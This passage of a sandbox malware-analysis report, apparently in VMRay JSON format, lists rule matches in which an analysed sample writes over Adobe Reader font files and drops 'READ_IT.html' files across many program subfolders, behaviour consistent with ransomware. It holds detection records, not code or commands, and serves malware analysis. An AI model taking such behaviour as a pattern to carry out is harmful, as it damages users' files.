"_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10993", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-it.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Regular.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-regular.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_11010", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-regular.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\SY______.PFB", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\sy______.pfb", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_11027", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\sy______.pfb\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZX______.PFB", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\zx______.pfb", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_11038", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\zx______.pfb\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZY______.PFB", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\zy______.pfb", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_11053", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\zy______.pfb\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\SY______.PFM", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\sy______.pfm", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_11070", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\sy______.pfm\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_11076", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zx______.pfm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\zx______.pfm", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_11079", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\zx______.pfm\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zy______.pfm", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\zy______.pfm", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_11086", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\zy______.pfm\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeFanHeitiStd-Bold.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobefanheitistd-bold.otf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_11236", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobefanheitistd-bold.otf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_11822", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_11864", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_11920", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\spplugins\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12078", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\spplugins\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12084", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\services\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12094", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\prc\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12124", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\prc\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12130", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_ukr\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12220", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_ukr\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_TUR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_tur\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12238", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_tur\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_slv\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12256", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_slv\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SKY\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_sky\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12274", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_sky\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rus\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12292", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rus\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rum\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12310", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rum\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_pol\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12328", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_pol\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hun\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12346", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hun\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hrv\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12364", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hrv\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_cze\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12382", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_cze\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12400", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12674", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_12680", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, 